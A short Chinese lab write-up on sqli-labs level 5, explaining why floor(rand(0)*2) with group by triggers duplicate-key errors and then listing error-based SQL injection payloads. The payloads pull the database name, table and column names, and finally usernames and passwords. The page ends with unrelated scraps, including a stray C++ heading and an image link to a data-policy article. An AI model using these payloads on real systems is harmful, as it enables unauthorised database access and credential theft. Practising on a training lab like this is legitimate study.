實驗環境sqllabs第五關
floor()報錯注入的原因是group by在向臨時表插入數據時,由于rand()多次計算導致插入臨時表時主鍵重復,從而報錯,又因為報錯前concat()中的SQL語句或函數被執行,所以該語句報錯且被拋出的主鍵是SQL語句或函數執行后的結果
因為還有一個最重要的特性,就是group by與rand()使用時,如果臨時表中沒有該主鍵,則在插入前rand()會再計算一次(也就是兩次,但有些博客寫的是多次,這個多次到底是幾次并不知道,但是以兩次來理解下面的實驗都能說的通)。就是這個特性導致了主鍵重復并報錯
上面這段話引用作者:酒仙橋六號部隊
關于floor()報錯注入,你真的懂了嗎? - SecPulse.COM | 安全脈搏
大家可以去看看他寫的原理很詳細
下面的是實驗過程
id=-1' union select count(*),1,concat('~',(select database()),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 3,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(column_name) from information_schema.columns where table_name='users'limit 1,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
?id=-1'union select count(*),1, concat('~',(select concat(column_name) from information_schema.columns where table_name='users' limit 2,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+
-1'union select count(*),1, concat('~',(select concat(password,username) from users limit 7,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+
?
?
?
--- 靜態成員變量/函數(static))
)
![[法規規劃]國家數據局局長劉烈宏《激活數據要素價值》演講要點解析](http://pic.xiahunao.cn/[法規規劃]國家數據局局長劉烈宏《激活數據要素價值》演講要點解析)
